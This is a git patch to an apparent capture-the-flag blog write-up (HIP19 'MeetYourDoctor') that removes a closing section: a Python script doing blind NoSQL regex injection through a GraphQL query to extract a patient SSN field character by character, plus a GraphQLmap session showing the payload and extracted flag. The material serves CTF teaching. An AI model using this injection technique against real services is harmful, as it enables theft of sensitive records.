From 2d816cd5c9bc04b04f58c45d8052c9529411eeed Mon Sep 17 00:00:00 2001 From: Swissky Date: Sat, 22 Jun 2019 15:15:33 +0200 Subject: [PATCH] Fix Part 1 - HIP --- _posts/2019-6-22-HIP19-MeetYourDoctor.md | 28 ------------------------ 1 file changed, 28 deletions(-) diff --git a/_posts/2019-6-22-HIP19-MeetYourDoctor.md b/_posts/2019-6-22-HIP19-MeetYourDoctor.md index 453052e..46949c8 100755 --- a/_posts/2019-6-22-HIP19-MeetYourDoctor.md +++ b/_posts/2019-6-22-HIP19-MeetYourDoctor.md @@ -169,31 +169,3 @@ The injection worked, now we can re-use the payload from the challenge #2 and ex {% endhighlight %} Obviously we scripted the data extraction in Python, the script below will get the last flag : `4f537c0a-7da6-4acc-81e1-8c33c02ef3b`. - -{% highlight python %} -def blind_nosql(URL): - data = "" - data_size = 35 - charset = "0123456789abcdef-" - while len(data) != data_size: - for c in charset: - query ="{doctors(options:%20%22{\%22\%22patients.ssn\%22:1}%22,%20search:%20%22{%20\%22patients.ssn\%22:%20{%20\%22$regex\%22:%20\%22^PLACEHOLDER\%22},%20\%22lastName\%22:\%22Admin\%22%20,%20\%22firstName\%22:\%22Admin\%22%20}%22){id, firstName}}" - injected = (URL.format(query)).replace("PLACEHOLDER", data + c) - r = requests.get(injected) - if r.json()['data']['doctors'] != []: - data += c - print("\033[92m[+] Data found:\033[0m {}".format(data)) -{% endhighlight %} - -At that time we were checking if the content of `r.json()['data']['doctors']` was not empty, in order to abstract the data extraction we now take a check input from the user in order to compare the output. - - -{% highlight json %} -GraphQLmap > nosqli -Query > {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}} -Check > 5d089c51dcab2d0032fdd08d -[+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b -{% endhighlight %} - -I hope you enjoyed the challenges as I did ! -Feel free to share the blog post ! :) \ No newline at end of file